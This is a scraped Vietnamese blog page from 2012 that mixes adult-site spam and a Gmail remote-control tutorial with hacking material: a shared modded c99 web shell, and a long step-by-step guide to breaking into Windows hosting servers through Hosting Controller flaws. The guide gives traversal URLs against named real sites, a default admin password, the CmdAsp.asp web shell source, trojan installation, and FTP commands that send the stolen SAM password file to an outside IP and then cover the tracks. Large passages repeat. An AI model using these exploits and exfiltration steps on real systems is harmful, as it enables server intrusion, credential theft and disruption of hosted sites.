WAPLAUXANH.NET
mình vừa lang thang trên mạng thấy site này hay phết,share ae xem thử
site này cung cấp nhiều nội dung mà ae xem là phải thích ngay
- Cung cấp truyen sex mới nhất,hot nhất trên thế giới
-kho phim sex hay nhất đầy đủ thể loại
- Thế giới anh sex với đủ thể loại và cốt truyện cực hấp dẫn .
- Tổng hợp anh sex dep hinh anh gai xinh cuc ki hap dan
Site này hoàn toàn miễn phí nha ae
-Giúp bạn không bõ lỡ bất cứ sự kiện tin tức về đời sống đang diễn ra
-Ứng dụng phong phú giúp cho điện thoại của phát huy được tất cả tính năng.
-Cốt truyện hấp dẫn được truyền tải tới các bạn bằng 1 giao diện thân thiện. Giúp việc theo dõi của bạn dễ dàng hơn
Thứ Năm, 27 tháng 12, 2012
Thứ Bảy, 22 tháng 12, 2012
Điều khiển máy tính từ xa qua Gmail
Có một vài tiện ích cho phép tạo kết nối điều khiến từ xa với máy tính. Nếu bạn đang cần gấp một kết nối để điều khiển máy tính từ xa mà chỉ yêu cầu mức cơ bản với cấu hình tối thiểu thì bạn có thể thực hiện thông qua tài khoản Gmail. sRemote là một ứng dụng bỏ túi nhỏ cho phép điều khiển từ xa máy tính thông qua tài khoản Gmail. Chương trình cho phép thực hiện một số câu lệnh cơ bản trên máy đầu xa qua Gmail.
Tải sRemote về máy. Giải nén file zip trong một thư mục. Khi sử dụng sRemote lần đầu tiên, chương trình sẽ đề nghị người dùng tạo một mật khẩu để truy cập máy tính mà sRemote đang chạy trên đó.
Lưu ý rằng không nên cung cấp mật khẩu này cho người khác bởi vì bất cứ ai có mật khẩu này đều có thể điều khiển từ xa máy tính của bạn.
Bước tiếp theo liên quan đến việc thiết lập chứng thực Gmail cho sRemote. Chỉ cần kích vào Gmail settings và nhập địa chỉ Gmail, mật khẩu và địa chỉ hồi đáp.
Một điều lưu ý là nếu người dùng đã kích hoạt chế độ xác thực hai bước trong tài khoản Gmail thì sẽ cần cấu hình một mật khẩu mới cho ứng dụng sRemote. Mật khẩu gốc cho tài khoản Gmail sẽ không có hiệu lực.
Sau khi cấu hình xong các thiết lập tài khoản Gmail, kích vào nút Start monitoring. sRemote sẽ kiểm tra tài khoản Gmail người dùng. Khoảng thời gian giám sát mặc định là 5 giây nhưng ta có thể cấu hình lại tùy theo yêu cầu.
Và đây là phần thú vị nhất khi bạn sẽ thực hiện ra lệnh cho máy tính đầu xa. Người dùng có thể sử dụng bất kỳ địa chỉ email nào và bất cứ thiết bị nào. Về cơ bản, người dùng sẽ phải gửi một email với cú pháp câu lệnh đặc biệt đến tài khoản Gmail đã được cấu hình trước đó (trong sRemote). Ví dụ như, nếu ta có email mycomputer@gmail.com được cấu hình trong sRemote, có thể gửi một email từ anyone@hotmail.com đến mycomputer@gmail.com với cú pháp sau:
password() ;command() ;
Với “password()” là mật khẩu người dùng đã cấu hình khi khởi động sRemote và “command()” là bất cứ câu lệnh nào mà sRemote hỗ trợ. Những câu lệnh này phải nằm trong dòng subject của email.
Xét tổng thể thì sRemote là một chương trình tiện dụng và thực sự hữu ích khi ai đó đang cần gấp một kết nối điều khiển từ xa trong vài phút. Có hai điểm cần được cải thiện trong sRemote. Thứ nhất là sRemote không hỗ trợ các địa chỉ Google Apps mà cũng sử dụng công nghệ của Gmail. Thứ hai, không có xác nhận cho biết câu lệnh có được thực hiện trên máy tính đầu xa hay không. Có lẽ, cần có một email hồi đáp thông báo rằng, câu lệnh đã được thực hiện thành công trên máy đầu xa.
Link sRemote: https://sites.google.com/site/venuss...edirects=0&d=1
NamNguyen (Theo MakeTechEasier)
Tải sRemote về máy. Giải nén file zip trong một thư mục. Khi sử dụng sRemote lần đầu tiên, chương trình sẽ đề nghị người dùng tạo một mật khẩu để truy cập máy tính mà sRemote đang chạy trên đó.
Lưu ý rằng không nên cung cấp mật khẩu này cho người khác bởi vì bất cứ ai có mật khẩu này đều có thể điều khiển từ xa máy tính của bạn.
Bước tiếp theo liên quan đến việc thiết lập chứng thực Gmail cho sRemote. Chỉ cần kích vào Gmail settings và nhập địa chỉ Gmail, mật khẩu và địa chỉ hồi đáp.
Một điều lưu ý là nếu người dùng đã kích hoạt chế độ xác thực hai bước trong tài khoản Gmail thì sẽ cần cấu hình một mật khẩu mới cho ứng dụng sRemote. Mật khẩu gốc cho tài khoản Gmail sẽ không có hiệu lực.
Sau khi cấu hình xong các thiết lập tài khoản Gmail, kích vào nút Start monitoring. sRemote sẽ kiểm tra tài khoản Gmail người dùng. Khoảng thời gian giám sát mặc định là 5 giây nhưng ta có thể cấu hình lại tùy theo yêu cầu.
Và đây là phần thú vị nhất khi bạn sẽ thực hiện ra lệnh cho máy tính đầu xa. Người dùng có thể sử dụng bất kỳ địa chỉ email nào và bất cứ thiết bị nào. Về cơ bản, người dùng sẽ phải gửi một email với cú pháp câu lệnh đặc biệt đến tài khoản Gmail đã được cấu hình trước đó (trong sRemote). Ví dụ như, nếu ta có email mycomputer@gmail.com được cấu hình trong sRemote, có thể gửi một email từ anyone@hotmail.com đến mycomputer@gmail.com với cú pháp sau:
password() ;command() ;
Với “password()” là mật khẩu người dùng đã cấu hình khi khởi động sRemote và “command()” là bất cứ câu lệnh nào mà sRemote hỗ trợ. Những câu lệnh này phải nằm trong dòng subject của email.
Xét tổng thể thì sRemote là một chương trình tiện dụng và thực sự hữu ích khi ai đó đang cần gấp một kết nối điều khiển từ xa trong vài phút. Có hai điểm cần được cải thiện trong sRemote. Thứ nhất là sRemote không hỗ trợ các địa chỉ Google Apps mà cũng sử dụng công nghệ của Gmail. Thứ hai, không có xác nhận cho biết câu lệnh có được thực hiện trên máy tính đầu xa hay không. Có lẽ, cần có một email hồi đáp thông báo rằng, câu lệnh đã được thực hiện thành công trên máy đầu xa.
Link sRemote: https://sites.google.com/site/venuss...edirects=0&d=1
NamNguyen (Theo MakeTechEasier)
Thứ Năm, 20 tháng 12, 2012
Share con shell số 1 tại việt nam,shell demons
Xin chào các bạn , mình xin share con shell mà chính tay mình mod , con shell này gốc là con c99 và mod thêm nhiều chức năng
các chức năng như sau:
Creat CGI shell
Creat Python shell
Creat symlink shell
Perl Bypass
Auto Root
Domain and User list
ShowsourceRead
Cgi Shell Priv pass=dz
Config Shell
LitespeedBypas
SsiBypass
SuExecByps
Wordpress Mysql Admin Shell
Joomla Mysql
Admin Shell
Php Eval Bypass
Php4 Bind 8888 Eval
Cpanel+Ftp+Telnet Cracker
Safe Mode php.ini
Mini Cgi
Php Backconnect
Dc Backconnect
Perlsocket
Python Bacconnect
Python izo
Metasploit Bacconnect
Encoder online
FTP brute
MySQL Manager
Proc.
......
và nhiều chức năng khác nữa
mong rằng con shell này sẽ giúp ích được cho ae
link down shell
http://www.mediafire.com/?7i2ts8odl0cxuxc
các chức năng như sau:
Creat CGI shell
Creat Python shell
Creat symlink shell
Perl Bypass
Auto Root
Domain and User list
ShowsourceRead
Cgi Shell Priv pass=dz
Config Shell
LitespeedBypas
SsiBypass
SuExecByps
Wordpress Mysql Admin Shell
Joomla Mysql
Admin Shell
Php Eval Bypass
Php4 Bind 8888 Eval
Cpanel+Ftp+Telnet Cracker
Safe Mode php.ini
Mini Cgi
Php Backconnect
Dc Backconnect
Perlsocket
Python Bacconnect
Python izo
Metasploit Bacconnect
Encoder online
FTP brute
MySQL Manager
Proc.
......
và nhiều chức năng khác nữa
mong rằng con shell này sẽ giúp ích được cho ae
link down shell
http://www.mediafire.com/?7i2ts8odl0cxuxc
Ebook hacking tổng hợp cho ae
Nội dung:
- Kiến thức hack cơ bản
- Bot net, hack sever, hack via Rfi, get root....
- Shell, local basic...và nhiều thứ khác
http://www.mediafire.com/?38rqrnow9e05b
- Kiến thức hack cơ bản
- Bot net, hack sever, hack via Rfi, get root....
- Shell, local basic...và nhiều thứ khác
http://www.mediafire.com/?38rqrnow9e05b
Thứ Tư, 19 tháng 12, 2012
[ HOT ] Nhận 45.000 tiền điện thoại và 20Mb DATA Miến Phí
http://www.mobifone.com.vn/web/vn/home/promotion.jsp?id=3520
soạn tin QC gởi 9241 - sau 1 phút báo 1 tin nhắn đến ,3-5 PHÚT SẼ CÓ sms báo và kiểm tra tài khoản
soạn tin QC gởi 9241 - sau 1 phút báo 1 tin nhắn đến ,3-5 PHÚT SẼ CÓ sms báo và kiểm tra tài khoản
Hack Server NT qua bug Hosting Controller
Hôm nay tôi sẽ hướng dẫn các bac cách hack Server và Website qua lỗi Hosting Controller !
Như các bạn đã thấy hiện giờ đã xuất hiện rất nhiều máy chủ trên thế giới (theo tôi kiểm tra và thử nghiệm trên 12 server hiện giờ vẫn chưa fix lỗi này) bị lỗi Hostingcontroller.
Hôm nay tôi xin nói về lỗi Hosting controller (HC) này :
Chú ý : Tôi viết bài này chỉ để các bạn học hỏi. Nếu có Hack thì chỉ nên thêm 1 file vào trong website để chứng tỏ là mình đã Hack. Không nên phá hoại làm ảnh hưởng đến nhiều người nha
+ Lỗi HC là lỗi của phần mềm Hosting Controller dùng để quản lý server cung cấp domain và hosting cho khách hàng thường được chạy dưới Win2000/NT. Tôi sẽ Hack qua lỗi HC và sẽ ví dụ với 1 server chưa fix đó là server chứa 38 site mà đã được Hacker Forum Hacked vào tháng trước .
+ Lỗi HC cho bạn thực hiện 1 dòng lệnh để đọc ổ cứng ( C; D; E ) thậm chí cả ổ A
của server qua 1 site hoặc trực tiếp bằng ID của server. Lỗi HC thực chất là bị lỗi của 4 file nằm trong phần mềm là : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp
Tôi sẽ viết cấu trúc của lệnh Hack vào server nhờ lỗi 4 file này :
..................
Trong đó HC có thể là : admin ; advadmin; hostingcontroller
Lỗi đầu tiên tôi giới thiệu với các bạn có tên Multiple security vulnerabilities. Đây là các đoạn Script cho phép bạn duyệt bất cứ file nào trên Server :
http://www.victim.com/advwebadmin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Trong đó Victim là Server bị lỗi HC mà bạn muốn Hack
Tôi sẽ ví dụ các Hack server qua 1 site nằm trong server (hay còn gọi là Hack
local exploit)
VD : site này đã bị Hacker Forum hack : http://123hollywood.com/hf.htm
ở thanh Address bạn đánh 1 trong các dòng lệnh sau :
http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Lúc nãy bạn sẽ vào được phần "Browser Directories". Đây là toàn bộ cấu trúc của Website đó. Khi các bạn đã vào được bên trong của ổ C:\ bạn thấy có thư mục websites (đối với server đang thử nghiệm này, còn đối với các server khác thì nó thường nằm ở ổ D:/) .
Nếu bạn đã thấy thì OK . Bạn hãy vào trong và thấy 1 loạt các website. Với server chúng ta đang Hack ở trên bạn sẽ thấy các website được đưa vào các thư mục riêng lẻ theo vần. Chúng ta hãy tìm tới website mà nhờ nó chúng ta vào dược server này .
Bạn hãy vào 123web/123kinh/123hollywood.com/www/. Bạn thấy đó cực kỳ đơn giản đúng không .
Sau khi biết được đường dẫn của site cần Hack thì bạn dùng Script sau :
http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath= C:\webspace\resadmin\testing\testing.com\www\..\.. \..\..\..\
Thay example bằng tên của Server và testing bằng tên trang Web muốn Hack
Ví dụ : Bạn đăng ký Website tên cuonglong của FPT thì tụi FPT sẽ cho bạn một nơi để trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www
Muốn Hack trang này thì bạn đánh Script như trên :
http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglong&sitename=cuong long.com&OpenPath= C:\webspace\resadmin\cuonglong\cuonglong.com\www\. .\..\..\..\..\
Vậy là bạn đã vào được cấu trúc thư mục của Web đó nhưng lúc này bạn chỉ quyền upload 1 file nào đó từ ổ cứng của bạn lên site đó thôi
Sau đó bạn upload file ntdaddy.asp Website đó. Và chạy file này trên Website đó để lấy những file *.mdb và *.SAM về, đây là file chứa password, bạn chỉ việc giải mã ra
Vậy là bạn đã Hack được Website đó rồi
Bây giờ tôi sẽ hướng dẫn các bạn cách upload và xoá file trên các site này :
Cái này thì cũng cực kỳ đơn giản, bạn hãy xem mẫu sau :
http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath=C:/webspace/..\
trong đó testing là các đường dẫn vào website mà bạn muốn upload ; OK !
Bây giờ thì bạn có thể nghịch thoải mái; Bạn có thể cho toàn bộ site die trong
1 giờ cũng được hi hi ..
Còn 1 vài lỗi nữa của HC, trong đó có lỗi cho phép bạn có khả năng khởi tạo cho mình 1 hosting trong server nhờ dòng lệnh sau :
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
Cũng như trên, Victim là Server bị lỗi HC mà bạn muốn Hack. Ví dụ đó là Website http://bigguy.ourweb.net/
http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.asp
Mình đã khởi tạo cái này, các bác vô xem : http://www.hackerforum.com/
Lỗi này cho phép cho đăng ký free Domain. Bạn hãy đăng ngay 1 Domain cho mình rồi vào http://www.victim.com/AdvAmin/ để Login với với Account vừa đăng ký. Sau khi Login, bạn click vào mục Directories trên menu rồi vào Domain của bạn. Sau đó, bạn hãy upload trang web của mình lên (nơi upload ở dưới cùng) và nhớ là tên trang web đừng dài, rồi click vào logout (ở bên phải trên cùng). Vậy là ta đã đi được nửa chặng đường
Tiếp theo bạn hãy vào : http://www.victim.com/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\username\www.yourdomain.com\www
Bạn hãy thay chữ "username" bằng username lúc đầu bạn đăng ký Domain và thay chữ www.yourdomain.com bằng địa chỉ Domain mà bạn đăng ký và enter. Ví dụ tôi đăng ký 1 Domain tên www.cuonglong.com với username là ncviet ở Website http://bigguy.ourweb.net/ thì tôi sẽ gõ :
http://bigguy.ourweb.net/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\ncviet\www.cuonglong.com\www
Đây là phần Import của Website. Nó sẽ hiện ra 4 khung đường dẫn. Bây giờ bạn hãy tìm trang web của mình ở khung thứ nhất bên dưới và click vào nó rồi nhấn nút "import". Bây giờ nó đã copy trang Web của bạn vào khung thứ hai bên dưới. Ok, vậy là bạn đã Hack xong rồi đó. ví dụ bạn upload file cl.htm thì đường dẫn Web của bạn sẽ là :
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Chú ý : www.victim.com sẽ được thay bằng Website bị lỗi hc. Và có thể trong quá trình hack, server sẽ bắt giữ IP của bạn vì vậy bạn nên ngụy trang cho thật khéo .
Bạn có thể tìm rất nhiều server hiện vẫn còn đang bị lỗi này bằng cách và http://www.google.com rồi nhập từ khoá "Hosting Controller" cho nó Search.
Tiếp theo là một lỗi slash dot dot của HC cho phép ta thấy được đường dẫn các ổ đĩa và các thư mục của server và ta có thể lợi dụng nó để add (thêm vào) một đường dẫn DSN để chỉ tới một địa chỉ mới. Để khai thác lỗi này bạn dùng đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= bspace\opendnsserver\target\target.com\db\..\..\.. \..\
Cái thứ hai là chúng ta có thể thay đổi hoàn toàn hay add vào thư mục admin và thi hành những gì chúng ta muốn. Để khai thác lỗi này chỉ cần đưa vào đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= C:\&oftpPath=C:\
Bạn có thể nắm quyền điều khiển toàn bộ các file trong thư mục (và có thể là cả C:\) và thay đổi tùy thích..
Và lỗi cuối cùng là default password, nếu admin không xoá hay thay đổi user có tên là AdvWebadmin (user default) thì điều này rất nguy hiểm, bởi vì ta có thể nắm quyền điều khiển hoàn toàn server (hay 1 phần) thông qua password default cho user này là "advcomm500349", sau đó thì hack chỉ là việc dễ dàng.
Tiện thể mình cũng chỉ thêm cho các bạn cách cài trojan hoặc 1 chương trình DoS (Denial of Service) vào server mà ban đã vào được để phục vụ cho công việc Hack cho mình sau này. Thường thì khi Hack qua lỗi HC bạn rất khó có thể cài thẳng chương trình vào ổ C:/ như lỗi IIS được. Nhưng chúng ta vẫn có thể cài 1 chương trình nhờ chúng ta setup qua site nằm trong server. Bạn hãy Upload 1 con trojan vào 1 site mà chúng ta muốn (Cách Upload như trên đã nói). Sau đây tôi sẽ cài 1 con reaccserver có chức năng khi cài vào 1 server chúng ta có thể điều khiển server bằng máy tính ở nhà mình. Tôi upload file reaccserver.exe lên site http://123hollywood.com/ .
Bây giờ muốn cài đặt trojan này vào trong server bạn hãy đánh dòng sau :
http://123hollywood.com/reaccserver.exe
Bạn tự hỏi làm sao mà nó có thể cài vào được server mà không qua thông báo ở máy chứ. Đúng, thường thì các phần mềm quản lý Hosting sẽ thông báo ở máy chủ nhưng thường thì người quản lý server sẽ bỏ qua chế độ này khi cài đặt HC Khi bạn đánh dòng trên nếu thành công thì ở IE sẽ thông báo "server setup file full". Nếu không thành công nó sẽ báo "Can't not Found". Lúc này bạn hãy đánh lại :
http://123hollywood.com/../../../reaccserver.exe
Đảm bảo sẽ OK
Chú ý : khi setup file đó thì PC của bạn cũng sẽ bị cài đặt chương trình đó. Bạn
hãy gỡ nó ra . Vừa rồi mình đã cài đặt trojan reaccserver rồi. Bây giờ bạn hãy dùng phần còn lại của chương trình là file cp.exe. Chúng ta có thể Shutdown hoặc Restart server kia. Thường thì server sẽ mất ít nhất 3 phút để khởi động lài .
Bây giờ mình cũng nói thêm về lỗi 1 số Website ở các server cài đặt HC là thường để các file upload.asp nằm ở trong các thư mục của Website. Vì vậy mặc dù lỗi HC có bị fix thì chúng ta cũng Hack như thường .
Đây là ví dụ : http://www.aten2000.com/aspupload_samples_docs/BothFormAndScript.asp Bạn thấy chưa ! Mình có thể upload bất cứ file nào mà mình muốn . Bây giờ mình thử tìm cấu trúc thường c1o của 1 website cài HC nha. Bạn hãy vào đây : http://www.aten2000.com/cmd.asp để xem toàn bộ server với các lệnh dir C:\ ; dir D:\ ; dir E:\ và đọc file bằng lệnh type C:\..[đườngdẫn].. ----> Chú ý : lệnh này có thể đọc được bất cứ file nào .
Bạn thử tìm trong đó mà xem cũng có nhiều lắm .
À khi các bạn vào được server, bạn nên cài 1 file ASP để đọc ổ cứng cho đễ. Đây
là cấu trúc của file cmd.asp :
-----------------------------------------------------------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor mans pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
-------------------------------------------------------------------------------------
NTDaddy có thể download ở đây: ntdaddy download
Ở một số server, không rõ lý do ta phải dùng kết hợp cả cmdasp và ntdaddy mới hiệu quả.
Để khai thác, có 2 nguồn thông tin cực kì quan trọng mà ta cần quan tâm trước tiên, đó là database của HC và file sam._, nơi chứa tất cả các thông tin về các host trên server.
File sam._ thật ra chỉ là bản backup, có thể ko đầy đủ, thường được lưu ở winnt\repair. Bản sam đầy đủ có ở winnt\system32\config, như bị lock, rất khó lấy. Sau khi lấy được sam._, các bạn dùng l0pht hoặc Lc3 (download ở http://www.l0pht.com/ hoặc rất nhiều trên net) để crack.
Còn database của các host, thường lưu trữ ở thư mục cài đặt HC, vd như c:\program files\advanced communitations\NT web hosting\...., là một file access.
Cách download các file như thế nào!? có vài cách cho bạn, nếu bạn biết được vị trí lưu trữ data các host trên server (vd như dạng d:\users\www\democoun\www, địa chỉ này thực chất khi browse trên browser sẽ là http://www.democoun.com/ chẳng hạn - đây chỉ là vd, các bạn phải tự tìm hiểu folder cụ thể, điều này rất quan trọng), bạn có thể dùng lệnh copy, chép thẳng các file này vào thư mục trên, sau đó download thẳng xuống từ browser, như www.democoun.com/sam._ .
Cách khác là dùng ftp để send file mình muốn đến 1 địa chỉ ftp mà mình biết, bằng gõ lệnh trong cmdasp.asp hay nddaddy.asp (Cách này tôi được Kha cung cấp thông tin). Tuy nhiên, ta ko thể nhập và chạy từng lệnh tương tác ftp dùng các trình này được, bạn phải tạo 1 file text có chứa danh sách các lệnh và yêu cầu ftp chạy các lệnh đó. Cách tạo 1 filte text, ta sẽ dùng lệnh echo, xem vd sau:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
sau khi nhập vào textbox lệnh của cmdasp và run, lệnh này sẽ tạo một file c:\dl.txt có chứa lệnh "open 111.214.156.105". Gần tương tự với các lệnh khác, vd lệnh sau sẽ thêm 1 dòng vào sau lệnh open trong file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Lưu ý từ câu lệnh thứ 2 trở đi, ta phải dùng ">>" thay vì ">". Các bạn làm tương tự với các lệnh còn lại, sao cho các lệnh trong dl.txt dùng để send ftp 1 file ít nhất phải có các lệnh sau:
OPEN 111.214.156.105
USER USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
Các lệnh trên sẽ send file c:\sam._ ở server bạn đang hack đến địa chỉ anon 111.214.156.105.
Như vậy, bạn đã tạo xong 1 script để ftp file cần. Bây giờ dùng lệnh sau để thực thi các lệnh trong dl.txt. Trước tiên, bạn chuyển về thư mục chứa dl.txt, dùng lệnh cd c:\, và nhập lệnh sau vào ô lệnh cmdasp: "ftp -n -s:c:\dl.txt" và Run!
Nếu thành công, tức là browser ko báo lỗi và chỉ hiện các thông tin kết nối ftp...thì file sam._ đã được gửi đến địa chỉ anon trên. Bạn chỉ việc ftp vào đó để download về. Sau đó bạn dùng chương trình L0phtCrack để giải mã file SAM đó
Lưu ý là các file bạn copy và download xong, hãy xóa để tránh bị phát hiện.
Muốn tìm các Website bị lỗi Hosting Controller thì bạn vào http://www.google.com rồi gõ : "allinurl:/advadmin" (không có dấu ngoặc kép) nhấn nút Google Search
Như các bạn đã thấy hiện giờ đã xuất hiện rất nhiều máy chủ trên thế giới (theo tôi kiểm tra và thử nghiệm trên 12 server hiện giờ vẫn chưa fix lỗi này) bị lỗi Hostingcontroller.
Hôm nay tôi xin nói về lỗi Hosting controller (HC) này :
Chú ý : Tôi viết bài này chỉ để các bạn học hỏi. Nếu có Hack thì chỉ nên thêm 1 file vào trong website để chứng tỏ là mình đã Hack. Không nên phá hoại làm ảnh hưởng đến nhiều người nha
+ Lỗi HC là lỗi của phần mềm Hosting Controller dùng để quản lý server cung cấp domain và hosting cho khách hàng thường được chạy dưới Win2000/NT. Tôi sẽ Hack qua lỗi HC và sẽ ví dụ với 1 server chưa fix đó là server chứa 38 site mà đã được Hacker Forum Hacked vào tháng trước .
+ Lỗi HC cho bạn thực hiện 1 dòng lệnh để đọc ổ cứng ( C; D; E ) thậm chí cả ổ A
của server qua 1 site hoặc trực tiếp bằng ID của server. Lỗi HC thực chất là bị lỗi của 4 file nằm trong phần mềm là : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp
Tôi sẽ viết cấu trúc của lệnh Hack vào server nhờ lỗi 4 file này :
..................
Trong đó HC có thể là : admin ; advadmin; hostingcontroller
Lỗi đầu tiên tôi giới thiệu với các bạn có tên Multiple security vulnerabilities. Đây là các đoạn Script cho phép bạn duyệt bất cứ file nào trên Server :
http://www.victim.com/advwebadmin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Trong đó Victim là Server bị lỗi HC mà bạn muốn Hack
Tôi sẽ ví dụ các Hack server qua 1 site nằm trong server (hay còn gọi là Hack
local exploit)
VD : site này đã bị Hacker Forum hack : http://123hollywood.com/hf.htm
ở thanh Address bạn đánh 1 trong các dòng lệnh sau :
http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Lúc nãy bạn sẽ vào được phần "Browser Directories". Đây là toàn bộ cấu trúc của Website đó. Khi các bạn đã vào được bên trong của ổ C:\ bạn thấy có thư mục websites (đối với server đang thử nghiệm này, còn đối với các server khác thì nó thường nằm ở ổ D:/) .
Nếu bạn đã thấy thì OK . Bạn hãy vào trong và thấy 1 loạt các website. Với server chúng ta đang Hack ở trên bạn sẽ thấy các website được đưa vào các thư mục riêng lẻ theo vần. Chúng ta hãy tìm tới website mà nhờ nó chúng ta vào dược server này .
Bạn hãy vào 123web/123kinh/123hollywood.com/www/. Bạn thấy đó cực kỳ đơn giản đúng không .
Sau khi biết được đường dẫn của site cần Hack thì bạn dùng Script sau :
http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath= C:\webspace\resadmin\testing\testing.com\www\..\.. \..\..\..\
Thay example bằng tên của Server và testing bằng tên trang Web muốn Hack
Ví dụ : Bạn đăng ký Website tên cuonglong của FPT thì tụi FPT sẽ cho bạn một nơi để trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www
Muốn Hack trang này thì bạn đánh Script như trên :
http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglong&sitename=cuong long.com&OpenPath= C:\webspace\resadmin\cuonglong\cuonglong.com\www\. .\..\..\..\..\
Vậy là bạn đã vào được cấu trúc thư mục của Web đó nhưng lúc này bạn chỉ quyền upload 1 file nào đó từ ổ cứng của bạn lên site đó thôi
Sau đó bạn upload file ntdaddy.asp Website đó. Và chạy file này trên Website đó để lấy những file *.mdb và *.SAM về, đây là file chứa password, bạn chỉ việc giải mã ra
Vậy là bạn đã Hack được Website đó rồi
Bây giờ tôi sẽ hướng dẫn các bạn cách upload và xoá file trên các site này :
Cái này thì cũng cực kỳ đơn giản, bạn hãy xem mẫu sau :
http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath=C:/webspace/..\
trong đó testing là các đường dẫn vào website mà bạn muốn upload ; OK !
Bây giờ thì bạn có thể nghịch thoải mái; Bạn có thể cho toàn bộ site die trong
1 giờ cũng được hi hi ..
Còn 1 vài lỗi nữa của HC, trong đó có lỗi cho phép bạn có khả năng khởi tạo cho mình 1 hosting trong server nhờ dòng lệnh sau :
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
Cũng như trên, Victim là Server bị lỗi HC mà bạn muốn Hack. Ví dụ đó là Website http://bigguy.ourweb.net/
http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.asp
Mình đã khởi tạo cái này, các bác vô xem : http://www.hackerforum.com/
Lỗi này cho phép cho đăng ký free Domain. Bạn hãy đăng ngay 1 Domain cho mình rồi vào http://www.victim.com/AdvAmin/ để Login với với Account vừa đăng ký. Sau khi Login, bạn click vào mục Directories trên menu rồi vào Domain của bạn. Sau đó, bạn hãy upload trang web của mình lên (nơi upload ở dưới cùng) và nhớ là tên trang web đừng dài, rồi click vào logout (ở bên phải trên cùng). Vậy là ta đã đi được nửa chặng đường
Tiếp theo bạn hãy vào : http://www.victim.com/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\username\www.yourdomain.com\www
Bạn hãy thay chữ "username" bằng username lúc đầu bạn đăng ký Domain và thay chữ www.yourdomain.com bằng địa chỉ Domain mà bạn đăng ký và enter. Ví dụ tôi đăng ký 1 Domain tên www.cuonglong.com với username là ncviet ở Website http://bigguy.ourweb.net/ thì tôi sẽ gõ :
